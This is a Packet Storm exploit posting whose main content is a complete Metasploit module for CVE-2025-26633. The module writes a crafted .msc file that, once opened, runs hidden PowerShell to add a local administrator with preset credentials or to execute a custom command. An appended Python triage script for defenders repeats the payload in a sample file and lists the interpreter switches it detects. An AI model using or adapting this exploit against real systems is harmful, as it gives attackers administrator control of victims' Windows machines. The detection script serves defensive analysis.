Score : 7 / 10 (HIGH)
CVSS : CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
Description : This Metasploit local Windows exploit module abuses the way Microsoft Management Console MMC processes specially crafted .msc files to achieve arbitrary PowerShell execution when a user opens the file. The payload is designed to create a new local...
ID : PACKETSTORM:219768
Published : Apr 24, 2026 at 00:00
Affected Product :
Affected Versions :
==================================================================================================================================
| # Title : Microsoft MMC (.MSC) File Execution Abuse Leading to Local Admin Creation Metasploit Module |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.microsoft.com |
==================================================================================================================================
[+] Summary : This Metasploit local Windows exploit module abuses the way Microsoft Management Console (MMC) processes specially crafted .msc files to achieve arbitrary PowerShell execution when a user opens the file.
The payload is designed to create a new local administrator account (or execute a custom command), but it only triggers when the victim manually opens the .msc file.
[+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::Windows::Priv
  include Msf::Post::File
  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Microsoft MMC MSC EvilTwin - Local Admin Creation (CVE-2025-26633)',
        'Description' => %q{
          This module exploits a vulnerability in Microsoft Management Console (MMC)
          that allows arbitrary code execution when a user opens a specially crafted
          .msc file.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'indoushka'
        ],
        'Platform' => 'win',
        'Arch' => [ARCH_X64, ARCH_X86],
        'Targets' => [
          [
            'Windows (Local Admin Creation)',
            {
              'Platform' => 'win',
              'Arch' => [ARCH_X64, ARCH_X86],
              'Type' => :windows_admin
            }
          ]
        ],
        'DefaultTarget' => 0
      )
    )

    register_options([
      OptString.new('FILENAME', [true, 'Output .msc filename', 'CVE-2025-26633-AddAdmin.msc']),
      OptString.new('USERNAME', [true, 'Local admin username to create', 'indoushka']),
      OptString.new('PASSWORD', [true, 'Local admin password', '112233Az-*/@!']),
      OptString.new('FULLNAME', [false, 'User full name', 'Lab User']),
      OptString.new('DESCRIPTION', [false, 'User description', 'Research account']),
      OptString.new('CUSTOM_COMMAND', [false, 'Custom command to execute instead of user creation', nil])
    ])

    register_advanced_options([
      OptBool.new('SILENT', [true, 'Run PowerShell silently', true]),
      OptBool.new('VERBOSE_OUTPUT', [true, 'Show verbose PowerShell output', false])
    ])
  end

  def exploit
    print_status("Creating malicious .msc file for CVE-2025-26633")

    filename = datastore['FILENAME']
    username = datastore['USERNAME']
    password = datastore['PASSWORD']
    fullname = datastore['FULLNAME']
    description = datastore['DESCRIPTION']

    powershell_cmd = build_powershell_payload(username, password, fullname, description)
    msc_content = build_msc_file(powershell_cmd)

    # Write the generated console file to the local Metasploit directory.
    file_path = File.join(Msf::Config.local_directory, filename)
    File.binwrite(file_path, msc_content)
    print_good("Malicious .msc file created: #{file_path}")

    store_loot(
      'mmc.malicious.msc',
      'application/octet-stream',
      rhost,
      msc_content,
      filename,
      'Malicious MSC file for CVE-2025-26633'
    )

    print_status("[*] Requires victim interaction to open MSC file")
    print_status("[*] Example: mmc.exe \"#{file_path}\"")
    print_status("[+] Admin user: #{username}")
  end

  private

  # Build the PowerShell command line embedded in the console file. A
  # CUSTOM_COMMAND option replaces the default account-creation script.
  def build_powershell_payload(username, password, fullname, description)
    if datastore['CUSTOM_COMMAND'] && !datastore['CUSTOM_COMMAND'].empty?
      return datastore['CUSTOM_COMMAND']
    end

    ps_script = <<~PS
      $user = '#{username}';
      $pass = ConvertTo-SecureString '#{password}' -AsPlainText -Force;
      New-LocalUser -Name $user -Password $pass -FullName '#{fullname}' -Description '#{description}' -ErrorAction SilentlyContinue;
      Add-LocalGroupMember -Group 'Administrators' -Member $user -ErrorAction SilentlyContinue;
    PS
    ps_script = ps_script.strip.gsub(/\n\s+/, '; ')

    cmd = "powershell.exe -NoP"
    cmd += " -W Hidden" if datastore['SILENT']
    cmd += " -NoExit" if datastore['VERBOSE_OUTPUT']
    cmd += " -C \"#{ps_script}\""
    cmd
  end

  # Wrap the command in the console-file XML and emit it as UTF-16LE,
  # matching the encoding named in the XML declaration.
  def build_msc_file(command)
    xml = <<~XML
      <?xml version="1.0" encoding="utf-16"?>
      <MMC_ConsoleFile ConsoleVersion="3.0">
        <SnapIns>
          <SnapIn>
            <Actions>
              <Action>
                <RunCommand>#{escape_xml(command)}</RunCommand>
              </Action>
            </Actions>
          </SnapIn>
        </SnapIns>
      </MMC_ConsoleFile>
    XML
    xml.strip.encode('utf-16le')
  end

  # Escape the command so it survives as XML element text.
  def escape_xml(text)
    text.to_s
        .gsub('&', '&amp;')
        .gsub('<', '&lt;')
        .gsub('>', '&gt;')
        .gsub('"', '&quot;')
        .gsub("'", '&apos;')
  end
end
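Defender-side companion to the module above (an added example, not part of the Packet Storm post or of the module): a Python triage script that decodes an .msc file the way the module writes it (UTF-16LE XML, BOM optional) and flags any element whose text launches an interpreter, reporting the hidden-window/no-profile switches and the local-admin creation pattern the payload uses. The interpreter and switch lists, and the sample files, are assumptions constructed for this example.

```python
# Added example, not part of the Packet Storm post or the Metasploit module above:
# static triage of an .msc console file for embedded command execution. It parses the
# UTF-16 XML layout the module emits (or any .msc stored as XML text); lists are assumed.
import re
import xml.etree.ElementTree as ET

INTERPRETERS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript")
# Hidden-window / no-profile are the switches the module above sets on its command line.
SUSPICIOUS_SWITCHES = ("-w hidden", "-nop", "-enc", "-noexit", "-ep bypass")

def decode_msc(data: bytes) -> str:
    """BOM if present, else UTF-16LE without BOM (what the module writes), else UTF-8."""
    if data.startswith((b"\xff\xfe", b"\xfe\xff")):
        return data.decode("utf-16")
    if len(data) >= 2 and data[0] == ord("<") and data[1] == 0:
        return data.decode("utf-16-le")
    return data.decode("utf-8")

def _walk(elem, path):
    yield path, elem
    for child in elem:
        yield from _walk(child, f"{path}/{child.tag}")

def find_command_elements(data: bytes) -> list:
    """Return every element whose text references a command interpreter, with its path."""
    text = re.sub(r"^\s*<\?xml[^>]*\?>", "", decode_msc(data))  # parse as str, no declaration
    root = ET.fromstring(text)
    hits = []
    for path, elem in _walk(root, root.tag):
        value = (elem.text or "").strip()
        low = value.lower()
        if not any(name in low for name in INTERPRETERS):
            continue
        hits.append({"path": path, "command": value,
                     "switches": [s for s in SUSPICIOUS_SWITCHES if s in low],
                     "creates_admin": "add-localgroupmember" in low and "administrators" in low})
    return hits

# Constructed samples mirroring the module's output layout, not real captures.
SAMPLE_MSC = (
    '<?xml version="1.0" encoding="utf-16"?><MMC_ConsoleFile ConsoleVersion="3.0">'
    '<SnapIns><SnapIn><Actions><Action><RunCommand>powershell.exe -NoP -W Hidden -C '
    '&quot;New-LocalUser -Name x; Add-LocalGroupMember -Group &apos;Administrators&apos; '
    '-Member x&quot;</RunCommand></Action></Actions></SnapIn></SnapIns></MMC_ConsoleFile>'
).encode("utf-16-le")
BENIGN_MSC = '<MMC_ConsoleFile ConsoleVersion="3.0"><SnapIns/></MMC_ConsoleFile>'.encode("utf-16")

if __name__ == "__main__":
    print(find_command_elements(SAMPLE_MSC))
```

The element path in each hit tells an analyst where in the console file the command sits, which is the string to pivot on in file-write and MMC process-creation telemetry.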
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================